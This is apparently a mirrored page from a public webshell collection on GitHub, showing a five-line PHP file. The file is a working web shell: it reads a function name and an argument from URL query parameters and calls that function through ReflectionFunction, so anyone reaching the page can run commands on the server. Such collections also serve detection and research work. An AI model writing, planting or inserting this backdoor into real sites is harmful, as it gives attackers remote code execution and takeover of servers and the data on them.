mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
5 lines
No EOL
100 B
Text
5 lines
No EOL
100 B
Text
|
|
<?php
|
|
$func = new ReflectionFunction($_GET[m]);
|
|
echo $func->invokeArgs(array($_GET[c]));
|
|
?> |